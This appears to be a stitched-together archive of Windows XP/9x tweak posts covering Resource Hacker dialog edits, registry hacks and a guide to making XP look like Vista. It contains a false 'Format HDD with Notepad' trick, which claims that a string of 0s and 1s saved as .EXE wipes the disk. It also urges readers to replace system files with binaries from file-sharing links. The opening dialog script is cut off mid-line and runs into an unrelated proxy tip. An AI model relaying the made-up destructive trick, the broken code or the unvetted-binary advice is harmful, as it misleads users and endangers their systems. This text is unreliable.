Customize System Properties Dialog

Here I’ll describe how to change the first tab “General” in System Properties dialog box. Following is a screenshot of the dialog box which u all wil get if u perform da following (easy) steps-:

Here’s a look at my Customized System properties dialog:-
Have a clear look at the image Here.

Follow The Following steps To do this :-
1. Download The Required images.
a.Amd users Download from Here
b.Intel Users Download from Here

2.Now extract all the images in a folder (NOTE THE IMAGES ARE NUMBERED )

3.Open %windir%\System32\sysdm.cpl file in Resource hacker.If you dont have resource hacker you can download it from Here.

4.Now we hv to replace existing 1.BMP file with the downloaded one. To do this,go to

a. Goto Bitmap -> 1 -> 1033.
b. Click on Action -> Replace Bitmap .
c. Click on Open file with new bitmap button.
d. Select the new downloaded 1.BMP file From the folder where u have extracted all the images and click on Open button.
e. Finally click on Replace button. Replace The other images In the same way..

5.Now we hv to add remaining downloaded BMPs in the file. To do this:

a. Click on Action -> Add a new Resource.
b. Click on Open file with a new resource. button.
c. Select 4.BMP and click on Open button.
d. Give 4 in Resource Name and 1033 in Resource Language text boxes.
e. Finally click on Add Resource button.

6.Repeat ,5th Step for other BMPs (5.BMP ,6.BMP,7.BMP,8.BMP,9.BMP,10.BMP,ETC) also. (Resource Name for 5.BMP & 6.BMP will be 5 & 6 respectively and Resource Language will be 1033 for both).Similarlythe resource name for 9.BMP & 10.BMP it wil be 9 & 10 repectively n Resource Language will be 1033.

7. Now goto Dialog -> 101 -> 1033 and replace existing code with the following code:

There Are 2 codes here:-

1.For Amd users .

2.Intel Users.
1..For AMD users ..


101 DIALOGEX 32, 10, 423, 230
STYLE DS_FIXEDSYS | DS_MODALFRAME | WS_POPUP | WS_VISIBLE | WS_CAPTION
CAPTION "System"
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
FONT 9, "Segoe UI"
{
CONTROL 6, 0, STATIC, SS_BITMAP | WS_CHILD | WS_VISIBLE | WS_GROUP, 65535, 2, 112, 214
CONTROL "", 52, STATIC, SS_LEFT | WS_CHILD | WS_VISIBLE | WS_GROUP, 126, 30, 100, 8
CONTROL "", 58, EDIT, ES_LEFT | ES_AUTOHSCROLL | ES_READONLY | WS_CHILD | WS_VISIBLE, 228, 215, 107, 8
CONTROL 4, 0, STATIC, SS_BITMAP | WS_CHILD | WS_VISIBLE | WS_GROUP, 352, 157, 43, 45
CONTROL "", 65, "Link Window", 0x50000000, 211, 115, 100, 8
CONTROL "", 66, "Link Window", 0x50000000, 211, 126, 100, 8
CONTROL "", 67, "Link Window", 0x50000000, 211, 137, 100, 8
CONTROL "Performance:", 0, STATIC, SS_LEFT | WS_CHILD | WS_VISIBLE | WS_GROUP, 126, 126, 46, 9
CONTROL "Model:", 0, STATIC, SS_LEFT | WS_CHILD | WS_VISIBLE | WS_GROUP, 126, 115, 21, 9
CONTROL "PID:", 0, STATIC, SS_LEFT | WS_CHILD | WS_VISIBLE | WS_GROUP, 211, 215, 17, 9
CONTROL 1, 0, STATIC, SS_BITMAP | WS_CHILD | WS_VISIBLE | WS_GROUP, 333, 28, 73, 68
CONTROL "Learn more online...", 0, STATIC, SS_LEFT | WS_CHILD | WS_VISIBLE | WS_GROUP, 418, 344, 71, 10 , 0x00000020
CONTROL "Windows is activated", 0, STATIC, SS_LEFT | WS_CHILD | WS_VISIBLE | WS_GROUP, 125, 215, 71, 10
CONTROL "Rating:", 0, STATIC, SS_LEFT | WS_CHILD | WS_VISIBLE | WS_GROUP, 126, 105, 32, 10
CONTROL 7, 0, STATIC, SS_BITMAP | WS_CHILD | WS_VISIBLE | WS_GROUP, 360, 109, 23, 31
CONTROL "Founded in 1969 and based in Sunnyvale, California, AMD provides microprocessors, Flash memory devices, and silicon-based solutions for customers in the communications and computer industries worldwide.", 0, STATIC, SS_LEFT | WS_CHILD | WS_VISIBLE | WS_GROUP, 126, 167, 213, 32
CONTROL "About AMD:", 0, STATIC, SS_LEFT | WS_CHILD | WS_VISIBLE | WS_GROUP, 126, 158, 43, 10
CONTROL 10, 0, STATIC, SS_BITMAP | WS_CHILD | WS_VISIBLE | WS_GROUP, 118, 93, 367, 10
CONTROL 12, 0, STATIC, SS_BITMAP | WS_CHILD | WS_VISIBLE | WS_GROUP, 119, 1, 187, 18
CONTROL 8, 0, STATIC, SS_BITMAP | WS_CHILD | WS_VISIBLE | WS_GROUP, 119, 146, 367, 10
CONTROL 11, 0, STATIC, SS_BITMAP | WS_CHILD | WS_VISIBLE | WS_GROUP, 209, 105, 144, 10
CONTROL 5, 0, STATIC, SS_BITMAP | WS_CHILD | WS_VISIBLE | WS_GROUP, 117, 18, 367, 10
CONTROL 9, 0, STATIC, SS_BITMAP | WS_CHILD | WS_VISIBLE | WS_GROUP, 117, 203, 367, 10
CONTROL "64-bit Operating System", 0, STATIC, SS_LEFT | WS_CHILD | WS_VISIBLE | WS_GROUP, 126, 137, 74, 9
CONTROL 3, 0, STATIC, SS_BITMAP | WS_CHILD | WS_VISIBLE | WS_GROUP, 346, 209, 54, 21
CONTROL "", 0, "SysDateTimePick32", DTS_SHORTDATEFORMAT | DTS_UPDOWN | WS_CHILD | WS_VISIBLE | WS_GROUP, 195, 58, 94, 11
CONTROL "Date:", 0, STATIC, SS_LEFT | WS_CHILD %

Free Proxy

This trick is for Win9x Registry

Try this if you want to set up a proxy, or are having problems with your current one.
Run Regedit and go to:

HKEY_LOCAL_MACHINE\Config\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings

First, set “EnableAutodial” to 1 if you use a dialup proxy service. Next, double-click “ProxyEnable” and replace the Decimal value of 0 with 1.
Your proxy is now fully enabled

Add Ur Name to Right Click Of my Computer

Here ill tell you how to add ur Name to right click on my Computer and also Open Your favoraite application with that .Heres How To do :-

1.Copy/Paste the following code in Notepad And then Save it as .reg

Windows Registry Editor Version 5.00 [HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor] @="Your Name Or Name of the Application" [HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor\command] @="Location Of The Application"

Eliminate Right Click On Desktop

To eliminate the right click on the desktop:

Start Regedit (Start->Run->And then Type REGEDIT)

Go to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer

Add a DWORD and give it a name of NoViewContextMenu

Give it a value of 1

Reboot And see The changes

Format HDD with Notepad

Here is a Notepad trick.
If u guys have more then dont hesitate in postin it.

Format HDD with Notepad

Step 1.
Write The Following In Notepad Exactly as it says

Code:

01001011000111110010010101010101010000011111100000

Step 2.
Save As it as .EXE and any Name would Do.

Step 3.
Make an Ethical use of it. Use it at ur own risk

Hibernate Options

Whenever you want to logoff, shut down or reboot your Windows XP machine you have only 3 choices (from left to right i.e
(1) Standby
(2) Restart
(3) Shutdown.
To properly enable Hibernation in WinXP: Start button -> Control Panel -> Power Options -> Hibernate tab -> check Enable hibernate support box -> Apply/OK -> reboot.
NOTE: If the Hibernate tab is unavailable your computer does NOT support it

For some reason Microsoft did NOT enable the 4th option: (4) Hibernate, which should be available on power saving (ACPI) enabled PCs and laptops.
But you CAN bring it back: just hold the Shift key while the Shut down menu is displayed on your screen, and notice the Standby button being replaced by a new, fully functional Hibernate button, which can be clicked with the left button of your mouse.
If you release the Shift key, the Hibernate option will disappear once again, to be replaced by Standby.

Fix Button Size

The Minimize , Maximize/Restore and Close Taskbar buttons are sometimes too small to rapidly select them, or too big, and take up a lot of space.It Aloso sometimes looks Ugly .Here’s a trick how to make them look cool

This Windows 9x/ME Registry tweak makes them long and slim, preserving the open program’s Taskbar icon (graphic), while forcing its title (text) to disappear.U can also customize The Size u want for the “Minimize, Maximize/Restore and Close Taskbar buttons ‘
For Doin So Open Regedit and go to:

HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics

Double-click the “CaptionWidth“ String value and change the number to 50. Then double-click the “CaptionHeight“ String value and change the number to -210. This works great on a screen resolution of 1024×768, with Small Fonts of size 7.
If your screen resolution is 800×600, make “CaptionWidth” 40 and “CaptionHeight” -165, and use Small Fonts size 6.
You can alter the size of the scroll buttons in the same manner by changing “ScrollHeight“ [String value] to -330 and “ScrollWidth“ [String value] to -135 in a resolution of 800×600.
Similarly set “ScrollHeight“ to -330 and “ScrollWidth“ to -165 if using a 1024×768 resolution.

ADD-ON: Depending on your particular program’s Title Bar size, you can also tweak the “MinWidth“ setting for more control over the size of your minimized programs’ Taskbar buttons.
Title Bar size can be (re)adjusted from Control Panel -> Display -> Appearance tab -> Scheme -> Active Title Bar -> increase/decrease the number in the Size box.
Run Regedit, go to the same Registry subkey used above, and modify the “MinWidth“ String value to read:

• -285 if Title Bar size is 18.
• -300 if Title Bar size is 19.
• -315 if Title Bar size is 20.

Default value is -2310.

Add Copy To And Move To Options Whenever U Right Click On A File

Once done, you will be able to right click any file or folder and use the Browse for Folder dialog to choose the location you want to move or copy your file or folder to, without having to go to the destination path,
its cool!

First we will add the copy and move options to the right click menu of all FILES.

CLICK Start>Run, type REGEDIT and click OK to open up the registry editor and make your way to this key:

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers

Right click the ContextMenuHandlers key and choose New>Key.
Name the new key “Copy To” (without the quotes).
Repeat the above and create another new key named Move To.

You should now have two new subkeys under the ContextMenuHandlers key:

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Copy To
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Move To

Select the Copy To key and in the right hand pane, double click “Default”
Enter this clsid value as the value data:

{C2FBB630-2971-11d1-A18C-00C04FD75D13}

Next , select the Move To key and in the right hand pane set the default value to:

{C2FBB631-2971-11d1-A18C-00C04FD75D13}

This now takes care of the Copy and Move options for the right click context menu of all your files.
Now all that is left is to add the same options to the right click menu of all your folders.
The procedure will be the same as for files but at a different key:

HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHan dlers

Right click ContextMenuHandlers and create a new key named Copy To.
Right click it again and create another new key named Move To.

left click on the right hand pane, add the same default values as you did for Files:

For Copy To:
{C2FBB630-2971-11d1-A18C-00C04FD75D13}
For the Move To:
{C2FBB631-2971-11d1-A18C-00C04FD75D13}

Exit the registry and you are done.

Now when you right click on a file or folder, you should see two new options: Copy to Folder and Move to Folder

P.s:- Create a Backup of your registery before perfroming this tweak,So that you canrestore ur default settings .

Change System Font

The default Windows 2000/XP shell font (for Explorer windows) is Tahoma, and the default system font (for System Properties, Device Manager ,etc) is MS Sans Serif. If you’re bored with the defaults, the only way to change them is to alter the Registry.

Open Regedit and go to:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes

Edit the “MS Shell Dlg“ String Value [REG_SZ] in the right hand pane and modify its “Microsoft Sans Serif“ default value to match any other font name installed on your system (i.e. Tahoma).
Then close Regedit and restart your computer for the change to take effect.”

If u all want toNew fonts You can Download It Form Here.There Are Many More sites avaliable ,but this is one of the Best i have found .

Make Windows XP Look-Like Win Vista

Bored of the same [b]old Looks of Windows Xp [/b]? I am sure you are , this[b] tutorial [/b]is really goonna help you to give your Windows Xp a new and cool Windows Vista Look and that too [b]WITHOUT[/b] [b]decreasing your computer performance by even 1 %.[/b]

Guys i do Know There are many[b] Vista Transformation packs [/b]avaliable on the net ,But I suggest everyone not to use that because of the following reasons :-
1.They make your comp really[b] slow[/b](You might feel that your comps running at the same speed for some days ,But after some time it will become really Slow)

2.They also install many unwanted[b] 3rd Party utilities [/b]which further slow down your computer.

You may also install the [b]original Vista [/b],But for that you need to have a [b]comp with good hardware resources [/b].The hardware requirement for Windows Vista is also [b] high [/b]and the cd is also [b]costily[/b].In this tutorial I will tell u how to get the Vista look for Free on your comp , [b]WITHOUT sacrificing your comps performance.[/b]To make Windows xp to look-a-like Windows Vista you need to change the following things :-

[color=orange]
[i]Visual style (or theme)
Mouse Cursors
Windows Icons all in shell32.dll 9replaced as in vista)
Boot screen
Login screen
Vista wallapapers
Sounds
Windows Explorer
Progress dialog box
Shutdown/log off dialog box
About Windows box
System Properties dialog box
Taskbar Icons
Vista taskmanager
Vista drive status bar etc…[/i][/color]

[size=18][b][i][color=orange]1. Vista Style:-[/color][/i][/b] [/size]
First thing which u should change in your windows is theme. I m Uploading A Theme . To use this theme u need to downlaod uxtheme patcher to patch your uxtheme file .You can Download uxthemepatcher from [url=http://www.softpedia.com/get/Desktop-Enhancements/Themes/UXTheme-Patch-For-Windows-XP-SP2-Final.shtml]here[/url]

[img]http://aycu38.webshots.com/image/18357/2000538998024837607_rs.jpg[/img]
[url=http://rapidshare.com/files/32658371/skin.rar.html] Download Theme[/url]
You may aslo want to use trensparent themes .there are many of them avaliable on the net.AND It requires Windowsblinds 5.5 Full Version!

[size=18][b][i][color=orange]2.Vista Mouse Cursors[/color]:-[/i][/b][/size]

Vista Cursors Look really cool download the pack from

[url=http://rapidshare.com/files/32718709/aero_cursors.zip.html][u]HERE[/u][/url]
How to Install It:-

- Extract the archive to a temporary folder.
- Right click the “Install.inf” file and click on “Install”
- Choose the cursorset in the control panel mouse applet
It appears as “Aero Cursors (Alphablended)”

[size=18][color=orange][b][i]3.Bootscreen:-[/b][/i][/color][/size]

In Vista, Microsoft has removed the graphical boot screen and there is a minimal boot screen with just a progress bar,it really looks good.
have a look :-
[img]http://aycu21.webshots.com/image/20660/2000550396028141922_rs.jpg[/img]
if u like it download it from [url=http://rapidshare.com/files/32721204/boot.zip.html][u]HERE[/u][/url]
and also download [url=http://www.soft32.com/Download/Free/BootSkin/4-18196-1.html]Startdock Bootskin[/url] To use it !!
You can also make your own boot screen using Tuneup Utilities. Its the Easiest Way to do it .

[size=18][color=orange][b][i]4.Login Screen:-
[/i][/b][/color][/size]

Heres A Look At Vista Login Screen created by me .
[img]http://aycu10.webshots.com/image/21409/2000593355869189892_rs.jpg[/img]
To apply the same login screen ,Just download the logonui.exe file file from [url=http://rapidshare.com/files/32727056/logonui.rar.html][u]HERE[/u][/url]
2. You will need to replace your current loginui.exe file with this new one
(the default login screen is stored in windows/system32 folder.)
3.To replace the logonui.exe file you will need replacer,Its a software
which is used to replace system files .
4.You can download it from [url=http://www3.telus.net/_/replacer/Replacer.zip]Here[/url]

And also download the login screen user images from [url=http://rapidshare.com/files/32727737/Vista_User_Images.zip.html][u]Here[/u][/url]

[color=orange][size=18][b][i]5.Vista Sounds-:[/i][/b][/size][/color]
Vista sounds are really good.You can download the whole pack from
[url=http://rapidshare.com/files/14250508/VistaSounds.zip.html][u]HERE[/u][/url]

[size=18][color=orange][b][i]6. Vista Explorer:-[/i][/b] [/color][/size]
Vista Explorer is Really Cool. It Contains Back & Forward Buttons along with the Address bar & Searchbar and under it there is another toolbar containing useful links, like Tile icons, details, and many more things. But there is a 3rd party utility available called “Styler”, which can add the same toolbars in XP explorer too
Download Styler from [url=http://www.crystalxp.net/galerie/en.id.551.htm][u]HERE[/u][/url]
And now download the skin for styler from [url=http://rapidshare.com/files/32732931/Vista_styler_skin.rar.html][u]HERE[/u][/url]
Now extract it and copy this skin to “%ProgramFiles%\Styler\TB\skins\Styler’s” directory and then apply it from the styler.

[size=18][color=orange][b][i]7. Vista Wallpapers:-[/i][/b] [/color][/size]

Download Some of the Vitsa Wallpapaers from [url=http://rapidshare.com/files/32731793/vISTA_WALLPapERS.rar.html][u]Here[/u][/url]. There are many more avaliable on the net.

[size=18][color=orange][b][i]8.Progress Dialog , Shutdown Dialog ,Run dialog ,System Icons and many more:-[/i][/b][/color][/size]

[color=orange][b][i]8.1Progress Dialog[/i][/b]:-[/color]
Vista progress dialog box is different from XP. But we can make our XP dialog box to look-a-like Vista one by using Resource Hacker.Resource HackerTM is a freeware utility to view, modify, rename,add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Win95, Win98, WinME, WinNT,Win2000 and WinXP operating systems. Navigate [url=http://delphi.icm.edu.pl/ftp/tools/ResHack.zip]Here[/url] to download Resource Hacker.

[img]http://img167.imageshack.us/img167/1282/666666666666666666666lo6.jpg[/img]

Just open “%windir%\System32\Shell32.dll” file in Resource Hacker and then goto:

Dialog -> 1020 -> 1033

Now replace the existing code in right-side pane with the following code:

[code]
1020 DIALOGEX 20, 20, 266, 108
STYLE DS_FIXEDSYS | DS_MODALFRAME | DS_NOIDLEMSG | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION “”
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
FONT 8, “MS SHELL DLG”
{
CONTROL “”, 106, “SysAnimate32″, ACS_AUTOPLAY | ACS_TIMER | WS_CHILD | WS_VISIBLE, 0, 0, 267, 25
CONTROL “”, 103, STATIC, SS_LEFTNOWORDWRAP | SS_NOPREFIX | WS_CHILD | WS_VISIBLE, 7, 34, 250, 10
CONTROL “”, 102, STATIC, SS_LEFTNOWORDWRAP | SS_NOPREFIX | WS_CHILD | WS_VISIBLE, 52, 88, 132, 10
CONTROL “”, 104, “msctls_progress32″, WS_CHILD | WS_VISIBLE, 7, 58, 250, 14
CONTROL “”, 105, STATIC, SS_LEFT | SS_NOPREFIX | WS_CHILD | WS_VISIBLE, 7, 44, 250, 10
CONTROL “”, 106, STATIC, SS_GRAYFRAME | WS_CHILD | WS_VISIBLE, 0, 76, 266, 1
CONTROL “Stop”, 2, BUTTON, BS_DEFPUSHBUTTON | WS_CHILD | WS_VISIBLE, 200, 85, 56, 16
CONTROL “Current file:”, 2, STATIC, SS_LEFT | WS_CHILD | WS_VISIBLE, 7, 88, 40, 10
}
[/code]

Click on [b]Compile Script [/b]button.
U’ll also hv to replace existing AVIs in the file with new Vista ones. Just download the Vista AVI from [url=http://rapidshare.com/files/33313645/a.b.rar.html]here[/url] and after extracting the AVI from it, replace following AVIs in the Shell32.dll file with this one:

[i][b]
AVI -> 160 ->1033
AVI -> 161 ->1033
AVI -> 162 ->1033
AVI -> 163 ->1033
AVI -> 164 ->1033[/b][/i]
[b]
NOW CLICK ON FILE AND THEN CLICK ON ‘SAVE AS’ .SAVE THE FILE ON YOUR DESKTOP WITH THE SAME NAME AND SAME EXTENSION (I.E SHELL32.DLL).tHEN REPALCE IT USING REPALCER .THE LINK TO DOWNLOAD REPLACER IS GIVEN IN THE 4 STEP i.e(Vista Login/Welcome Screen).THE INSTRUCTIONS ON HOW TO REPLACE A FILE IS ALSO MENTIONED THERE .
FOLLOW THE ABOVE STEPS WHEN YOU MODIFY A SYSTEM FILE AND WANNA SAVE IT.[/b]

[b][i][color=orange]8.2:- Shutdown/log off dialog box[/color][/i]:[/b]

Windows Vista doesnt hv any shutdown/logoff dialog box just like XP hv but XP default dialog box doesnt look good. So here I’ll tell u how to change it in XP?wit my Own customized dialig box

Heres how it looks :-

[img]http://aycu40.webshots.com/image/21079/2000355687050655382_rs.jpg[/img]

To make it like this :-

Download required BMP files from [url=http://rapidshare.com/files/33314731/shutdown.rar.html]here[/url]. Extract the file and u’ll get 4 BMPs with the name:
[i]
[b]a.bmp
b.bmp
c.bmp
d.bmp[/b][/i]
Now open “%windir%\System32\Shell32.dll” file in Resource Hacker and then replace following BITMAPs with the mentioned BMP files:
[i][b]
Bitmap -> 14351 -> 1033 with a.bmp
Bitmap -> 14353 -> 1033 with b.bmp
Bitmap -> 14354 -> 1033 with a.bmp
Bitmap -> 14355 -> 1033 with b.bmp
Bitmap -> 14356 -> 1033 with c.bmp[/b][/i]
now save the file and open %windir%\System32\msgina.dll file in Resource Hacker and then replace following BITMAPs with the mentioned BMP files:

[i][b]Bitmap -> 20140 -> 1033 with a.bmp
Bitmap -> 20141 -> 1033 with b.bmp
Bitmap -> 20142 -> 1033 with a.bmp
Bitmap -> 20143 -> 1033 with b.bmp
Bitmap -> 20150 -> 1033 with d.bmp[/b][/i]

Now save the file[b].(follow the steps Mention in 8.1)[/b]

And if u want to change the text of the shutdown dialog (ie make it same as shown in the image)

open %windir%\System32\msgina.dll file in Resource Hacker
and go to:-
[b]
Dialog -> 20100 -> 1033[/b]

and in the right hand side repalce the default code with the following one :-

[code]
20100 DIALOGEX 0, 0, 208, 122
STYLE DS_SYSMODAL | DS_SETFOREGROUND | WS_POPUP | WS_BORDER
CAPTION “”
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
FONT 8, “MS Shell Dlg”
{
CONTROL “Cancel”, 2, BUTTON, BS_PUSHBUTTON | WS_CHILD | WS_VISIBLE | WS_TABSTOP, 155, 104, 42, 18
CONTROL “Flag”, 20101, STATIC, SS_OWNERDRAW | WS_CHILD | WS_VISIBLE, 171, 3, 32, 26
CONTROL “Bye Bye.”, 20102, STATIC, SS_OWNERDRAW | WS_CHILD | WS_VISIBLE, 7, 3, 149, 26
CONTROL “&Wil B Back”, 20104, BUTTON, BS_OWNERDRAW | BS_NOTIFY | WS_CHILD | WS_VISIBLE | WS_TABSTOP, 36, 51, 22, 19
CONTROL “T&ake Care”, 20103, BUTTON, BS_OWNERDRAW | BS_NOTIFY | WS_CHILD | WS_VISIBLE | WS_TABSTOP, 93, 51, 22, 19
CONTROL “&Just Coming”, 20105, BUTTON, BS_OWNERDRAW | BS_NOTIFY | WS_CHILD | WS_VISIBLE | WS_TABSTOP, 150, 51, 22, 19
CONTROL “&Hibernate”, 20106, BUTTON, BS_PUSHBUTTON | BS_NOTIFY | WS_CHILD | WS_VISIBLE, 13, 104, 42, 18
CONTROL “”, 20108, STATIC, SS_OWNERDRAW | WS_CHILD | WS_VISIBLE | WS_DISABLED, 22, 73, 50, 8
CONTROL “”, 20107, STATIC, SS_OWNERDRAW | WS_CHILD | WS_VISIBLE | WS_DISABLED, 79, 73, 50, 8
CONTROL “”, 20109, STATIC, SS_OWNERDRAW | WS_CHILD | WS_VISIBLE | WS_DISABLED, 136, 73, 50, 8
}
[/code]

[b]Compile it n save it …………[/b]([b]Follow The steps mentioned in 8.1 To save it)[/b]

[color=orange][b][i]8.3.Run Dialog[/i][/b]:-[/color]
heres a look at my customized run dialog ;-

[img]http://img407.imageshack.us/img407/3005/555555555555555555555yq0.jpg[/img]

to make it like thid open shell32.dll in resource Hacker n go to

[b]Dialog->1003->1003[/b]

In the right hand plane replace the default code with the following one;-

[code]
1003 DIALOGEX 0, 0, 256, 102
STYLE DS_FIXEDSYS | DS_MODALFRAME | DS_NOIDLEMSG | DS_CONTEXTHELP | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION “Run”
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
FONT 8, “MS Shell Dlg”
{
CONTROL “”, 12298, COMBOBOX, CBS_DROPDOWN | CBS_AUTOHSCROLL | CBS_DISABLENOSCROLL | WS_CHILD | WS_VISIBLE | WS_VSCROLL | WS_TABSTOP, 33, 7, 183, 199
CONTROL “OK”, 1, BUTTON, BS_DEFPUSHBUTTON | WS_CHILD | WS_VISIBLE | WS_TABSTOP, 23, 80, 50, 14
CONTROL “&Browse.”, 12288, BUTTON, BS_PUSHBUTTON | WS_CHILD | WS_VISIBLE | WS_TABSTOP, 182, 80, 50, 14
CONTROL 9890, 0, STATIC, SS_BITMAP | WS_CHILD | WS_VISIBLE | WS_CLIPSIBLINGS | WS_GROUP, 65533, 65535, 260, 105
}
[/code]

[b]Click on compile [/b]
And also download a BMP file from [url=http://rapidshare.com/files/33318975/1.rar.html]here[/url] and after extracting the BMP file from it,then . Just click on Action -> Add a new resource and then click on Open file with new resource button. Select the downloaded BMP file and click on Open. Now in Resource Name enter 9890 and in Resource Language enter 1033 and click on Add Resource button.
([b]Follow The steps mentioned in 8.1 To save it)[/b]

[color=orange][b][i]8.4.About Windows Dialog[/i][/b][/color]

[img]http://img167.imageshack.us/img167/2319/44444444444444444444444gn2.jpg[/img]

Download the required BITMAP file from [url=http://rapidshare.com/files/33319936/about.rar.html]here[/url] and then open “%windir%\System32\Shell32.dll” file in Resource Hacker and then replace following BITMAPs with the downloaded BMP file:
[i][b]
Bitmap -> 131 -> 1033 (For XP Professional)
Bitmap -> 147 -> 1033 (For XP Home)[/b][/i]

Now open %windir%\System32\msgina.dll file in Resource Hacker and then replace following BITMAPs with the downloaded BMP file:
[i]
[b]Bitmap -> 101 -> 1033 (For XP Professional)
Bitmap -> 107 -> 1033 (For XP Professional)
Bitmap -> 128 -> 1033 (For XP Home)
Bitmap -> 129 -> 1033 (For XP Home)[/b][/i]

Now to change the text of dialog box, open “%windir%\System32\xpsp1res.dll” file in Resource Hacker and then goto:

[b]Dialog -> 14352 -> 1033[/b]
Now replace the existing code in right-side pane with the following code:

[code]
14352 DIALOGEX 20, 20, 275, 198
STYLE DS_FIXEDSYS | DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
CAPTION “About %s”
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
FONT 8, “MS Shell Dlg”
{
CONTROL 0, 12297, STATIC, SS_ICON | WS_CHILD | WS_VISIBLE, 7, 55, 21, 20
CONTROL “Microsoft ® %s”, 13568, STATIC, SS_LEFTNOWORDWRAP | SS_NOPREFIX | WS_CHILD | WS_VISIBLE, 35, 55, 200, 10
CONTROL “”, 13579, STATIC, SS_LEFTNOWORDWRAP | SS_NOPREFIX | WS_CHILD | WS_VISIBLE, 35, 65, 235, 10
CONTROL “Copyright © %s Microsoft Corporation”, 13578, STATIC, SS_LEFT | SS_NOPREFIX | WS_CHILD | WS_VISIBLE, 35, 75, 210, 10
CONTROL “”, 13581, STATIC, SS_LEFT | SS_NOPREFIX | WS_CHILD | WS_VISIBLE, 35, 85, 180, 20
CONTROL “This product is licensed under the terms of the End-User License Agreement to:”, 13586, “SysLink”, 0×50000000, 35, 105, 180, 20
CONTROL “user name”, 13575, STATIC, SS_LEFT | SS_NOPREFIX | WS_CHILD | WS_VISIBLE, 45, 125, 180, 10
CONTROL “org name”, 13576, STATIC, SS_LEFT | SS_NOPREFIX | WS_CHILD | WS_VISIBLE, 45, 135, 180, 10
CONTROL “”, 13095, STATIC, SS_ETCHEDHORZ | WS_CHILD | WS_VISIBLE, 35, 147, 235, 1
CONTROL “Physical memory available to Windows:”, 13570, STATIC, SS_LEFT | SS_NOPREFIX | WS_CHILD | WS_VISIBLE, 35, 152, 130, 10
CONTROL “”, 13571, STATIC, SS_LEFT | SS_NOPREFIX | WS_CHILD | WS_VISIBLE, 167, 152, 88, 10
CONTROL “OK”, 1, BUTTON, BS_DEFPUSHBUTTON | WS_CHILD | WS_VISIBLE | WS_TABSTOP, 220, 178, 50, 14
}
[/code]

Fianally Click On[b] compile Button [/b]And Save the File .

[size=18][color=orange][b][i]9.Vista Icons:-[/i]………..[/b][/color][/size]
There r lots of icon packs available on net, which can be used to change default XP icons with the Vista ones automatically. I’m posting a link to a iconpack which is the best :

http://www.joejoe.biz/joejoe/Download/VIP3_IP.ip

Just download it and then u can use [url=http://www.soft32.com/Download/free-trial/IconPackager/4-13518-1.html][u]Startdock IconPackager[/u][/url] to apply the iconpack.

[size=18][color=orange][b][i]10.System Properties Dialog:-[/i]………..[/b][/color][/size]
To change ur system properties dialog refer to the tutorial[url=http://www.chip-india.com/townsquare/viewtopic.php?t=22326]HACKING UR SYSTEM PROPERTIES DIALOG [/URL]

[size=18][color=orange][b][i]11.Taskbar Icons[/i][/b][/color] [/size]
Guys I Hv also modified My netshell File (which is reponsible for the taskbar icons) I hv made it Look Like Vista.here’s a look

[img]http://i14.tinypic.com/54k1eyq.jpg[/img]

Download the file from [URL=http://rapidshare.com/files/32744727/netshell.zip.html][u]HERE[/u][/URL]
And Then Replace It With Replacer .

[size=18][color=orange][b][i]1.Vista Taskmanager:-[/i][/b][/color][/size]

Guys I have also made a Windows Vista taskmanager for windows Xp .Navigate [url=http://windowstweaker.prohosts.org/?page_id=40]Here[/url] to Download it .Its really cool.

[size=18][color=orange][b][i]13.Vista Drive Status Bar:-[/i][/b][/color][/size]
in Windows Vista there is a small horizontal progress bar is displayed under each drive icon showing the filled/remaining space in the drive. U can also do the same in XP by using a 3rd party utility uploaded . Just run the file and it’ll add the progress bar in each drive.
[img]http://i8.tinypic.com/4lencjm.jpg[/img]
DOWNLOAD IT FROM [url=http://rapidshare.com/files/32747874/aaaaaaaa.zip.html][u]HERE[/u][/URL] IT LOOKS REALLY COOL[i][/i][img][/img]

[size=18][color=orange][b][i]14.Sidebar:-[/i][/b][/color][/size]

Windows Vista also contains a Sidebar, which is displayed on right-side on desktop (by default and can be changed to be displayed at left-side). U can also use a sidebar in XP. Just download it from [url=http://www.thoosje.com/][u]Here[/u][/url]

Hope You All Like it ,If u hv more suggestions then pls post them. [b][u]Remember this tutorial is for doing the task manually and not using the transformation packs[/u][/b]

Display any message when a User logs on to the computer

Pop a banner each time Windows Boots

Pop a banner each time Windows BootsTo pop a banner which can contain any message you want to display just before a user is going to log on, go to the key:

HKEY_LOCAL_MACHINE/SOFTWARE/

Microsoft/Windows/CurrentVersion/WinLogon

Now create a new string Value in the right pane named LegalNoticeCaption and enter the value that you want to see in the Menu Bar. Now create yet another new string value and name it: LegalNoticeText. Modify it and insert the message you want to display each time Windows boots. This can be effectively used to display the company's private policy each time the user logs on to his NT box. It's .reg file would be:REGEDIT4 [HKEY_LOCAL_MACHINE/SOFTWARE/

Microsoft/Windows/CurrentVersion/Winlogon] "LegalNoticeCaption"="Caption here."

DISK DEFRAGMENTER ISSUES FOR WIN ME AND WIN 98

Unable to defrag your computer??

Method 1:

1. Press CTRL+ALT+DELETE.

2. In the Close Program dialog box, click any program in the list, except Explorer or Systray, and then click End Task. If you are prompted to click End Task again, do so.

3. Repeat steps 1-2 for each program listed in the Close Program dialog box, except Explorer and Systray.

4. Start the Disk Defragmenter tool.

Method 2:

1. Restart your computer.

2. While your computer restarts (After the Power On Self Test (POST), press and hold the CTRL key until the Windows 98 Startup menu is displayed.
